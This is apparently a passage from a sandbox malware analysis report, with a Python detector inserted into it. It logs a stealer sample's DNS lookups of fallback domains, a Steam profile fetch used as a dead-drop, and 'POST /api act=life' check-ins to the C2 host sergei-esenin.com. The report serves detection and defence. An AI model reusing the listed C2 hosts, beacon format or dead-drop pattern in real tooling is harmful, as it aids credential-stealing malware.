Oct 14, 2024 06:52:06.938198090 CEST | 443 | 49730 | 104.102.49.254 | 192.168.2.4
Oct 14, 2024 06:52:06.961575031 CEST | 49731 | 443 | 192.168.2.4 | 104.21.53.8
Oct 14, 2024 06:52:06.961622953 CEST | 443 | 49731 | 104.21.53.8 | 192.168.2.4
Oct 14, 2024 06:52:06.961685896 CEST | 49731 | 443 | 192.168.2.4 | 104.21.53.8
                                                          Oct 14, 2024 06:52:06.961999893 CEST49731443192.168.2.4104.21.53.8
                                                          Oct 14, 2024 06:52:06.962013960 CEST44349731104.21.53.8192.168.2.4
                                                          Oct 14, 2024 06:52:07.447230101 CEST44349731104.21.53.8192.168.2.4
                                                          Oct 14, 2024 06:52:07.447329998 CEST49731443192.168.2.4104.21.53.8
                                                          Oct 14, 2024 06:52:07.449961901 CEST49731443192.168.2.4104.21.53.8
                                                          Oct 14, 2024 06:52:07.449971914 CEST44349731104.21.53.8192.168.2.4
                                                          Oct 14, 2024 06:52:07.450294971 CEST44349731104.21.53.8192.168.2.4
                                                          Oct 14, 2024 06:52:07.451558113 CEST49731443192.168.2.4104.21.53.8
                                                          Oct 14, 2024 06:52:07.451590061 CEST49731443192.168.2.4104.21.53.8
                                                          Oct 14, 2024 06:52:07.451689005 CEST44349731104.21.53.8192.168.2.4
                                                          Oct 14, 2024 06:52:07.578798056 CEST44349731104.21.53.8192.168.2.4
                                                          Oct 14, 2024 06:52:07.578916073 CEST44349731104.21.53.8192.168.2.4
                                                          Oct 14, 2024 06:52:07.579008102 CEST44349731104.21.53.8192.168.2.4
                                                          Oct 14, 2024 06:52:07.579094887 CEST44349731104.21.53.8192.168.2.4
                                                          Oct 14, 2024 06:52:07.579098940 CEST49731443192.168.2.4104.21.53.8
                                                          Oct 14, 2024 06:52:07.579133987 CEST44349731104.21.53.8192.168.2.4
                                                          Oct 14, 2024 06:52:07.579155922 CEST49731443192.168.2.4104.21.53.8
                                                          Oct 14, 2024 06:52:07.579277039 CEST44349731104.21.53.8192.168.2.4
                                                          Oct 14, 2024 06:52:07.579339027 CEST49731443192.168.2.4104.21.53.8
                                                          Oct 14, 2024 06:52:07.579396963 CEST49731443192.168.2.4104.21.53.8
                                                          Oct 14, 2024 06:52:07.579415083 CEST44349731104.21.53.8192.168.2.4
                                                          Oct 14, 2024 06:52:07.579427004 CEST49731443192.168.2.4104.21.53.8
                                                          Oct 14, 2024 06:52:07.579437017 CEST44349731104.21.53.8192.168.2.4
                                                          Oct 14, 2024 06:52:07.643392086 CEST49732443192.168.2.4104.21.53.8
                                                          Oct 14, 2024 06:52:07.643429995 CEST44349732104.21.53.8192.168.2.4
                                                          Oct 14, 2024 06:52:07.643507004 CEST49732443192.168.2.4104.21.53.8
                                                          Oct 14, 2024 06:52:07.643781900 CEST49732443192.168.2.4104.21.53.8
                                                          Oct 14, 2024 06:52:07.643799067 CEST44349732104.21.53.8192.168.2.4
                                                          Oct 14, 2024 06:52:08.131323099 CEST44349732104.21.53.8192.168.2.4
                                                          Oct 14, 2024 06:52:08.131640911 CEST49732443192.168.2.4104.21.53.8
                                                          Oct 14, 2024 06:52:08.133153915 CEST49732443192.168.2.4104.21.53.8
                                                          Oct 14, 2024 06:52:08.133166075 CEST44349732104.21.53.8192.168.2.4
                                                          Oct 14, 2024 06:52:08.133701086 CEST44349732104.21.53.8192.168.2.4
                                                          Oct 14, 2024 06:52:08.134907961 CEST49732443192.168.2.4104.21.53.8
                                                          Oct 14, 2024 06:52:08.134941101 CEST49732443192.168.2.4104.21.53.8
                                                          Oct 14, 2024 06:52:08.135116100 CEST44349732104.21.53.8192.168.2.4
                                                          Oct 14, 2024 06:52:08.724137068 CEST44349732104.21.53.8192.168.2.4
                                                          Oct 14, 2024 06:52:08.724314928 CEST44349732104.21.53.8192.168.2.4
                                                          Oct 14, 2024 06:52:08.724365950 CEST49732443192.168.2.4104.21.53.8
                                                          Oct 14, 2024 06:52:08.724984884 CEST49732443192.168.2.4104.21.53.8
                                                          Oct 14, 2024 06:52:08.725009918 CEST44349732104.21.53.8192.168.2.4
                                                          Oct 14, 2024 06:52:08.725024939 CEST49732443192.168.2.4104.21.53.8
                                                          Oct 14, 2024 06:52:08.725033045 CEST44349732104.21.53.8192.168.2.4
Timestamp                             Source Port  Dest Port  Source IP       Dest IP
Oct 14, 2024 06:52:05.178119898 CEST  61554        53         192.168.2.4     1.1.1.1
Oct 14, 2024 06:52:05.187215090 CEST  53           61554      1.1.1.1         192.168.2.4
Oct 14, 2024 06:52:05.189241886 CEST  53766        53         192.168.2.4     1.1.1.1
Oct 14, 2024 06:52:05.198281050 CEST  53           53766      1.1.1.1         192.168.2.4
Oct 14, 2024 06:52:05.200339079 CEST  63169        53         192.168.2.4     1.1.1.1
Oct 14, 2024 06:52:05.209512949 CEST  53           63169      1.1.1.1         192.168.2.4
Oct 14, 2024 06:52:05.211009979 CEST  53209        53         192.168.2.4     1.1.1.1
Oct 14, 2024 06:52:05.219938040 CEST  53           53209      1.1.1.1         192.168.2.4
Oct 14, 2024 06:52:05.221678972 CEST  58628        53         192.168.2.4     1.1.1.1
Oct 14, 2024 06:52:05.232213020 CEST  53           58628      1.1.1.1         192.168.2.4
Oct 14, 2024 06:52:05.233741045 CEST  58554        53         192.168.2.4     1.1.1.1
Oct 14, 2024 06:52:05.249588966 CEST  53           58554      1.1.1.1         192.168.2.4
Oct 14, 2024 06:52:05.250602961 CEST  50547        53         192.168.2.4     1.1.1.1
Oct 14, 2024 06:52:05.266468048 CEST  53           50547      1.1.1.1         192.168.2.4
Oct 14, 2024 06:52:05.267740965 CEST  51153        53         192.168.2.4     1.1.1.1
Oct 14, 2024 06:52:05.282567024 CEST  53           51153      1.1.1.1         192.168.2.4
Oct 14, 2024 06:52:05.284353018 CEST  61982        53         192.168.2.4     1.1.1.1
Oct 14, 2024 06:52:05.291683912 CEST  53           61982      1.1.1.1         192.168.2.4
Oct 14, 2024 06:52:06.949424982 CEST  50599        53         192.168.2.4     1.1.1.1
Oct 14, 2024 06:52:06.960937023 CEST  53           50599      1.1.1.1         192.168.2.4
Oct 14, 2024 06:52:35.624850988 CEST  53           57713      162.159.36.2    192.168.2.4
Oct 14, 2024 06:52:36.120326996 CEST  57321        53         192.168.2.4     1.1.1.1
Oct 14, 2024 06:52:36.127024889 CEST  53           57321      1.1.1.1         192.168.2.4
Timestamp                             Source IP    Dest IP      Trans ID  OP Code             Name                       Type                  Class        DNS over HTTPS
Oct 14, 2024 06:52:05.178119898 CEST  192.168.2.4  1.1.1.1      0xf0e5    Standard query (0)  clearancek.site            A (IP address)        IN (0x0001)  false
Oct 14, 2024 06:52:05.189241886 CEST  192.168.2.4  1.1.1.1      0xe7bb    Standard query (0)  mobbipenju.store           A (IP address)        IN (0x0001)  false
Oct 14, 2024 06:52:05.200339079 CEST  192.168.2.4  1.1.1.1      0xa27c    Standard query (0)  eaglepawnoy.store          A (IP address)        IN (0x0001)  false
Oct 14, 2024 06:52:05.211009979 CEST  192.168.2.4  1.1.1.1      0x417d    Standard query (0)  dissapoiznw.store          A (IP address)        IN (0x0001)  false
Oct 14, 2024 06:52:05.221678972 CEST  192.168.2.4  1.1.1.1      0xd62e    Standard query (0)  studennotediw.store        A (IP address)        IN (0x0001)  false
Oct 14, 2024 06:52:05.233741045 CEST  192.168.2.4  1.1.1.1      0x4e38    Standard query (0)  bathdoomgaz.store          A (IP address)        IN (0x0001)  false
Oct 14, 2024 06:52:05.250602961 CEST  192.168.2.4  1.1.1.1      0xaa46    Standard query (0)  spirittunek.store          A (IP address)        IN (0x0001)  false
Oct 14, 2024 06:52:05.267740965 CEST  192.168.2.4  1.1.1.1      0xc1d6    Standard query (0)  licendfilteo.site          A (IP address)        IN (0x0001)  false
Oct 14, 2024 06:52:05.284353018 CEST  192.168.2.4  1.1.1.1      0x5f68    Standard query (0)  steamcommunity.com         A (IP address)        IN (0x0001)  false
Oct 14, 2024 06:52:06.949424982 CEST  192.168.2.4  1.1.1.1      0x9a5d    Standard query (0)  sergei-esenin.com          A (IP address)        IN (0x0001)  false
Oct 14, 2024 06:52:36.120326996 CEST  192.168.2.4  1.1.1.1      0x6236    Standard query (0)  241.42.69.40.in-addr.arpa  PTR (Pointer record)  IN (0x0001)  false
Timestamp                             Source IP    Dest IP      Trans ID  Reply Code      Name                       CName  Address         Type                  Class        DNS over HTTPS
Oct 14, 2024 06:52:05.187215090 CEST  1.1.1.1      192.168.2.4  0xf0e5    Name error (3)  clearancek.site            none   none            A (IP address)        IN (0x0001)  false
Oct 14, 2024 06:52:05.198281050 CEST  1.1.1.1      192.168.2.4  0xe7bb    Name error (3)  mobbipenju.store           none   none            A (IP address)        IN (0x0001)  false
Oct 14, 2024 06:52:05.209512949 CEST  1.1.1.1      192.168.2.4  0xa27c    Name error (3)  eaglepawnoy.store          none   none            A (IP address)        IN (0x0001)  false
Oct 14, 2024 06:52:05.219938040 CEST  1.1.1.1      192.168.2.4  0x417d    Name error (3)  dissapoiznw.store          none   none            A (IP address)        IN (0x0001)  false
Oct 14, 2024 06:52:05.232213020 CEST  1.1.1.1      192.168.2.4  0xd62e    Name error (3)  studennotediw.store        none   none            A (IP address)        IN (0x0001)  false
Oct 14, 2024 06:52:05.249588966 CEST  1.1.1.1      192.168.2.4  0x4e38    Name error (3)  bathdoomgaz.store          none   none            A (IP address)        IN (0x0001)  false
Oct 14, 2024 06:52:05.266468048 CEST  1.1.1.1      192.168.2.4  0xaa46    Name error (3)  spirittunek.store          none   none            A (IP address)        IN (0x0001)  false
Oct 14, 2024 06:52:05.282567024 CEST  1.1.1.1      192.168.2.4  0xc1d6    Name error (3)  licendfilteo.site          none   none            A (IP address)        IN (0x0001)  false
Oct 14, 2024 06:52:05.291683912 CEST  1.1.1.1      192.168.2.4  0x5f68    No error (0)    steamcommunity.com         none   104.102.49.254  A (IP address)        IN (0x0001)  false
Oct 14, 2024 06:52:06.960937023 CEST  1.1.1.1      192.168.2.4  0x9a5d    No error (0)    sergei-esenin.com          none   104.21.53.8     A (IP address)        IN (0x0001)  false
Oct 14, 2024 06:52:06.960937023 CEST  1.1.1.1      192.168.2.4  0x9a5d    No error (0)    sergei-esenin.com          none   172.67.206.204  A (IP address)        IN (0x0001)  false
Oct 14, 2024 06:52:36.127024889 CEST  1.1.1.1      192.168.2.4  0x6236    Name error (3)  241.42.69.40.in-addr.arpa  none   none            PTR (Pointer record)  IN (0x0001)  false
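The two DNS tables above record the sample's resolution order: eight lookups of .store and .site names that all came back NXDOMAIN within roughly 100 ms of each other, then a successful lookup of steamcommunity.com, and, once the Steam profile page had been fetched, a lookup of sergei-esenin.com. That "hardcoded list fails, pivot through a public site, then resolve the real C2" sequence is what a resolver-side detection should key on. The script below is an added example, not code from this report or from the sample: it encodes the sequence as a detector over resolver events. The DNS_EVENTS list is transcribed from the tables above; the burst thresholds, the five-second lookahead and the DEAD_DROP_HOSTS set are assumptions chosen for this example.

```python
from datetime import datetime, timedelta

# Constructed from the DNS query/answer tables above (timestamps as shown, CEST).
# Fields: answer time, queried name, reply code, returned addresses.
DNS_EVENTS = [
    ("2024-10-14 06:52:05.187215", "clearancek.site",           "NXDOMAIN", []),
    ("2024-10-14 06:52:05.198281", "mobbipenju.store",          "NXDOMAIN", []),
    ("2024-10-14 06:52:05.209512", "eaglepawnoy.store",         "NXDOMAIN", []),
    ("2024-10-14 06:52:05.219938", "dissapoiznw.store",         "NXDOMAIN", []),
    ("2024-10-14 06:52:05.232213", "studennotediw.store",       "NXDOMAIN", []),
    ("2024-10-14 06:52:05.249588", "bathdoomgaz.store",         "NXDOMAIN", []),
    ("2024-10-14 06:52:05.266468", "spirittunek.store",         "NXDOMAIN", []),
    ("2024-10-14 06:52:05.282567", "licendfilteo.site",         "NXDOMAIN", []),
    ("2024-10-14 06:52:05.291683", "steamcommunity.com",        "NOERROR",  ["104.102.49.254"]),
    ("2024-10-14 06:52:06.960937", "sergei-esenin.com",         "NOERROR",  ["104.21.53.8", "172.67.206.204"]),
    ("2024-10-14 06:52:36.127024", "241.42.69.40.in-addr.arpa", "NXDOMAIN", []),
]

# Assumption for this example: legitimate services that stealers use as
# dead-drop resolvers. A hit here right after a failure burst is the pivot,
# not the C2 itself, so it is reported separately.
DEAD_DROP_HOSTS = {"steamcommunity.com"}


def _ts(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S.%f")


def nxdomain_bursts(events, min_failures=5, window=timedelta(seconds=2)):
    """Group NXDOMAIN answers that all fall within `window` of the first one.

    Any successful answer closes the current group. Returns the groups that
    reached `min_failures` names, each as a list of names in arrival order.
    """
    bursts, current, start = [], [], None
    for ts, name, rcode, _ in events:
        t = _ts(ts)
        if rcode == "NXDOMAIN" and (start is None or t - start <= window):
            start = start or t
            current.append(name)
            continue
        # a successful answer, or a failure outside the window: close the group
        if len(current) >= min_failures:
            bursts.append(current)
        current, start = ([name], t) if rcode == "NXDOMAIN" else ([], None)
    if len(current) >= min_failures:
        bursts.append(current)
    return bursts


def fallback_chain(events, lookahead=timedelta(seconds=5), **burst_kw):
    """For every burst, list what resolved successfully shortly afterwards.

    Returns one dict per burst: the failed names, the dead-drop hosts that
    resolved next, and the remaining successful names (candidate C2).
    """
    findings = []
    for burst in nxdomain_bursts(events, **burst_kw):
        last_fail = max(_ts(ts) for ts, name, rc, _ in events
                        if rc == "NXDOMAIN" and name in burst)
        dead_drops, candidates = [], []
        for ts, name, rcode, answers in events:
            if rcode != "NOERROR" or not last_fail < _ts(ts) <= last_fail + lookahead:
                continue
            (dead_drops if name in DEAD_DROP_HOSTS else candidates).append((name, answers))
        findings.append({"failed": burst, "dead_drop": dead_drops, "candidate_c2": candidates})
    return findings


if __name__ == "__main__":
    for f in fallback_chain(DNS_EVENTS):
        print(f"{len(f['failed'])} failures, pivot via {[n for n, _ in f['dead_drop']]}, "
              f"candidate C2 {f['candidate_c2']}")
```

The same tuples can be produced from a Zeek dns.log or a resolver's query log; the point of the lookahead is that the candidate C2 name is only interesting in the context of the burst that preceded it, since sergei-esenin.com on its own carries no reputation at the time of first sight. The lone NXDOMAIN for the PTR lookup at 06:52:36 is correctly ignored, which is why the minimum-failures threshold exists.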
                                                          • steamcommunity.com
                                                          • sergei-esenin.com
Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.4  49730        104.102.49.254  443               6988  C:\Users\user\Desktop\file.exe
Timestamp                Bytes transferred  Direction  Data
2024-10-14 04:52:06 UTC  219                OUT        GET /profiles/76561199724331900 HTTP/1.1
                                                          Connection: Keep-Alive
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Host: steamcommunity.com
2024-10-14 04:52:06 UTC  1870               IN         HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                          Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                          Cache-Control: no-cache
                                                          Date: Mon, 14 Oct 2024 04:52:06 GMT
                                                          Content-Length: 34837
                                                          Connection: close
                                                          Set-Cookie: sessionid=7f29bf101b41067af1b6c20b; Path=/; Secure; SameSite=None
                                                          Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
2024-10-14 04:52:06 UTC  14514              IN         Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-10-14 04:52:06 UTC  16384              IN         Data Raw: 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 09 09 6a 51 75 65 72 79 28 66 75 6e 63 74 69 6f 6e 28 24 29 20 7b 0d 0a 09 09 09 24 28 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 27 29 2e 76 5f 74 6f 6f 6c 74 69 70 28 7b 27 6c 6f 63 61 74 69 6f 6e 27 3a 27 62 6f 74 74 6f 6d 27 2c 20 27 64 65 73 74 72 6f 79 57 68 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f
Data Ascii: <script type="text/javascript">jQuery(function($) {$('#global_header .supernav').v_tooltip({'location':'bottom', 'destroyWhenDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#glo
2024-10-14 04:52:06 UTC  3768               IN         Data Raw: 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 73 75 6d 6d 61 72 79 5f 66 6f 6f 74 65 72 22 3e 0d 0a 09 09 09 09 09 09 09 3c 73 70 61 6e 20 64 61 74 61 2d 70 61 6e 65 6c 3d 22 7b 26 71 75 6f 74 3b 66 6f 63 75 73 61 62 6c 65 26 71 75 6f 74 3b 3a 74 72 75 65 2c 26 71 75 6f 74 3b 63 6c 69 63 6b 4f 6e 41 63 74 69 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 3e 56 69 65 77 20 6d 6f 72 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 20 24 4a 28 20 66 75 6e 63 74 69 6f 6e 28 29
Data Ascii: <div class="profile_summary_footer"><span data-panel="{&quot;focusable&quot;:true,&quot;clickOnActivate&quot;:true}" class="whiteLink" class="whiteLink">View more info</span></div><script type="text/javascript"> $J( function()
2024-10-14 04:52:06 UTC  171                IN         Data Raw: 09 3c 73 70 61 6e 3e 56 69 65 77 20 6d 6f 62 69 6c 65 20 77 65 62 73 69 74 65 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 0d 0a 09 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 63 6f 6e 74 65 6e 74 20 2d 2d 3e 0d 0a 0d 0a 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 66 72 61 6d 65 20 2d 2d 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e
Data Ascii: <span>View mobile website</span></div></div></div></div><!-- responsive_page_content --></div><!-- responsive_page_frame --></body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
1           192.168.2.4  49731        104.21.53.8     443               6988  C:\Users\user\Desktop\file.exe
Timestamp                Bytes transferred  Direction  Data
2024-10-14 04:52:07 UTC  264                OUT        POST /api HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Content-Length: 8
                                                          Host: sergei-esenin.com
2024-10-14 04:52:07 UTC  8                  OUT        Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2024-10-14 04:52:07 UTC  553                IN         HTTP/1.1 200 OK
                                                          Date: Mon, 14 Oct 2024 04:52:07 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          X-Frame-Options: SAMEORIGIN
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z5oOjXMjkFaP6CRvGVpeEJ%2BHOqhZMfjk%2FOXIR9FHnyNMZNHVyZUUNndxEmMZbmm6ClCakFfH9Be5tfJvz2oa9N%2FqaJEuZI0Srw9YlQ3cJMrBLPdltEcGQy4TMe90mqyMWWw5lg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d24f54b0c804398-EWR
2024-10-14 04:52:07 UTC  816                IN         Data Raw: 31 31 35 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
Data Ascii: 1151<!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]>    <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]>    <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if
2024-10-14 04:52:07 UTC  1369               IN         Data Raw: 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f
Data Ascii: s/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style><!--[if gte IE 10]><!--><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('co
2024-10-14 04:52:07 UTC  1369               IN         Data Raw: 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 30 34 30 34 30 3b 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 62 6f 72 64 65 72 3a 20 30 3b 22 3e 4c 65 61 72 6e 20 4d 6f 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 6f 72 6d 20 61 63 74 69 6f 6e 3d 22 2f 63 64 6e 2d 63 67 69 2f 70 68 69 73 68 2d 62 79 70 61 73 73 22 20 6d 65 74 68 6f 64 3d 22 47 45 54 22 20 65 6e 63 74 79 70 65 3d 22 74 65 78 74 2f 70 6c 61 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70
Data Ascii: ement/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain"> <inp
2024-10-14 04:52:07 UTC  887                IN         Data Raw: 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61
Data Ascii: <span class="cf-footer-separator sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="bra
2024-10-14 04:52:07 UTC  5                  IN         Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
2           192.168.2.4  49732        104.21.53.8     443               6988  C:\Users\user\Desktop\file.exe
Timestamp                Bytes transferred  Direction  Data
2024-10-14 04:52:08 UTC  354                OUT        POST /api HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Cookie: __cf_mw_byp=eY.z8bZweqIPgKfpYDlsN4_L2R0LQF9aLZkPSL_aagI-1728881527-0.0.1.1-/api
